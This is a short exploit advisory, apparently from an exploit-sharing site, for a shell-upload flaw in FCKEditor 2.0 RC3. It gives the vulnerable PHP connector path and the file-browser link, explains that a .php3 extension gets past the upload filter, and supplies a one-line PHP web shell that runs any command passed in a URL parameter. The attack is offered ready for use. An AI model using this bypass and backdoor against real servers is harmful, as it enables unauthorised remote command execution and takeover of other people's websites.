FCKEditor Version 2.0 (Release Candidate 3) Shell Upload Exp

Posted on 17 March 2010

================================================================
FCKEditor Version 2.0 (Release Candidate 3) Shell Upload Exploit
================================================================

FCKEditor Shell Upload Exploit
------------------------------

Web-App: FCKEditor.
Version: Version 2.0 RC3 (Release Candidate 3).
Link   : http://sourceforge.net/projects/fckeditor/files/FCKeditor/
Author : Aodrulez.
Email  : f3arm3d3ar@gmail.com

Vulnerable File :
-----------------

http://127.0.0.1/editor/filemanager/browser/default/connectors/php/connector.php


Vulnerable Link :
-----------------
http://127.0.0.1/editor/filemanager/browser/default/browser.html?Connector=/editor/filemanager/browser/default/connectors/php/connector.php




Exploit :
---------

You can upload a php backdoor with this
extension: .php3




Sample Backdoor:(save as "any_name.php3")
-----------------------------------------
<? system($_GET["cmd"]); ?>




# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

Last 20

Exploits :

Last 20